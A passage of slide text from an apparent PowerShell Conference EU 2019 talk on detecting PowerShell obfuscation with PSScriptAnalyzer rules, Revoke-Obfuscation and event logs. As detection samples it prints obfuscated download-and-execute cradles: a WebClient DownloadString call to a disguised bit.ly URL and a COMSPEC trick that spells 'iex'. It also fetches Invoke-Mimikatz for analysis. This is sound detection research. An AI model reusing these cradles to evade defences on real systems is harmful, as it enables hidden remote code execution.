  • 50. Out-Obfuscated -Level Minimal -Type @('Quantity','Depth') • Two types of minimal obfuscation (can be combined): • Quantity – Obfuscate only 3 of the 27 script blocks • Depth – Light obfuscation of any given token PowerShell Conference EU 2019 Deep Obfuscation Shallow Obfuscation ."Do`wn`load`Str`in`g" ."Download`String" .("{1}{0}{2}" -f "load","Down","String") .("Download"+"String") Targeted Token-Specific Detection Opportunity!
  • 51. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 52. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInMember PowerShell Conference EU 2019
  • 53. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInMember PowerShell Conference EU 2019 Deep Obfuscation Shallow Obfuscation ."Do`wn`load`Str`in`g" ."Download`String" .("{1}{0}{2}" -f "load","Down","String") .("Download"+"String")
  • 54. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInMember PowerShell Conference EU 2019
  • 55. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInMember PowerShell Conference EU 2019 Deep Obfuscation Shallow Obfuscation ."Do`wn`load`Str`in`g" ."Download`String" .("{1}{0}{2}" -f "load","Down","String") .("Download"+"String")
  • 56. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-LongMemberValue PowerShell Conference EU 2019
  • 57. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-LongMemberValue PowerShell Conference EU 2019 Deep Obfuscation (Invoke-CradleCrafter) ((((New-Object Net.WebClient)|GM)|Where-Object{(Get- Item Variable:/_).Value.Name- like'D*g'}).Name)
  • 58. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInVariable PowerShell Conference EU 2019
  • 59. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInVariable PowerShell Conference EU 2019 Invocation Obfuscation . ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
  • 60. PowerShell Conference EU 2019 . ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
  • 61. PowerShell Conference EU 2019 . ( ${eNv:coMsPEC}[4,15,25]-JOin'' ) 27 chars
  • 62. PowerShell Conference EU 2019 . ( ${eNv:coMsPEC}[4,15,25]-JOin'' ) 4 15 25
  • 63. PowerShell Conference EU 2019 . 'iex' 4 15 25 https://i.imgur.com/8oXBdLG.gif
  • 64. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInVariable PowerShell Conference EU 2019
  • 65. Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInVariable PowerShell Conference EU 2019 Variable Obfuscation (ISE Steroids) ${____/=/==//===}
  • 66. New-Item -ItemType Idea -Name PesterSec • PS> Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"( 'ht'+'tps:/bit.ly/L3g1t') PowerShell Conference EU 2019
  • 67. Get-Help PesterSec -Detailed • PSScriptAnalyzer_Obfuscation_Detection_Rules.psm1 • Measure-TickUsageInCommand • Measure-TickUsageInArgument • Measure-TickUsageInMember • Measure-TickUsageInVariable • Measure-NonAlphanumericUsageInMember • Measure-NonAlphanumericUsageInVariable • Measure-LongMemberValue • Measure-SAObfuscation.psm1 • Wrapper module for displaying aggregated ScriptAnalyzer hits PowerShell Conference EU 2019
  • 69. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 70. $moduleLogs | Group-Object PipelineID,CommandName • Fingerprint abnormal scripts by cmdlet groupings • AST to query from extracted script (group on Command) • EID 4103 events for executed script (group on PipelineID,CommandName) PowerShell Conference EU 2019 # Load script to analyze. $script = Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke- Mimikatz.ps1 # Tokenize script. $tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null) # Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands. $tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content | Where-Object { $_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name
  • 71. $moduleLogs | Group-Object PipelineID,CommandName • Fingerprint abnormal scripts by cmdlet groupings • AST to query from extracted script (group on Command) • EID 4103 events for executed script (group on PipelineID,CommandName) PowerShell Conference EU 2019 # Load script to analyze. $script = Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke- Mimikatz.ps1 # Tokenize script. $tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null) # Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands. $tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content | Where-Object { $_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name
  • 72. Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019 powershell.exe Invoke-Expression $env:gkwa Pipeline execution details for command line: Invoke-Expression $env:gkwa Context Information: DetailSequence=1 <REDACTED> CommandLine=Invoke-Expression $env:gkwa Details: CommandInvocation(Invoke-Expression): "Invoke-Expression" ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>" Windows PowerShell – EID 800 Cmdlet invoked Parent ScriptBlock
  • 73. Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019 powershell.exe iex $env:gkwa Pipeline execution details for command line: iex $env:gkwa Context Information: DetailSequence=1 <REDACTED> CommandLine=iex $env:gkwa Details: CommandInvocation(Invoke-Expression): "Invoke-Expression" ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>" Windows PowerShell – EID 800 Cmdlet invoked Parent ScriptBlock
  • 74. Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019 powershell.exe ie`x $env:gkwa Pipeline execution details for command line: ie`x $env:gkwa Context Information: DetailSequence=1 <REDACTED> CommandLine=ie`x $env:gkwa Details: CommandInvocation(Invoke-Expression): "Invoke-Expression" ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>" Windows PowerShell – EID 800 Cmdlet invoked Parent ScriptBlock OBFUSCATED!
  • 75. Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019 sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' ) Pipeline execution details for command line: sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' ) Context Information: DetailSequence=1 <REDACTED> CommandLine=sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' ) Details: CommandInvocation(Invoke-Expression): "Invoke-Expression" ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>" Windows PowerShell – EID 800 OBFUSCATED!
  • 76. $ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
  • 77. $keyTakeaway[0] • PowerShell obfuscation is easily accessible to all • Used frequently ITW • MOSTLY de-obfuscated by PowerShell scriptblock logging • Data science-driven detection exists with Revoke-Obfuscation • Maximum obfuscation is used by some attackers more than others • Minimal obfuscation is far less frequent but quite effective • PSScriptAnalyzer enables the best of both worlds for detection: • AST for targeted token type calculations and inspection • Flexible logic for marking as suspicious, creating weak signals, etc. PowerShell Conference EU 2019
  • 78. $keyTakeaway[1] # Thank You PowerShell Community!!! • TFW you combine PowerShell logging, Revoke-Obfuscation AND PesterSec: PowerShell Conference EU 2019 https://media0.giphy.com/media/6XTnkNHVZv6AU/giphy.gifhttps://thumbs.gfycat.com/CooperativeDeliciousCaracal-size_restricted.gif
  • 79. • Daniel Bohannon • Twitter: @danielhbohannon • Blog: https://danielbohannon.com/ • Github:_https://github.com/danielbohannon/ about_Author PowerShell Conference EU 2019 http://workpulse.io/blog/wp-content/uploads/2015/09/themasterpeice.gif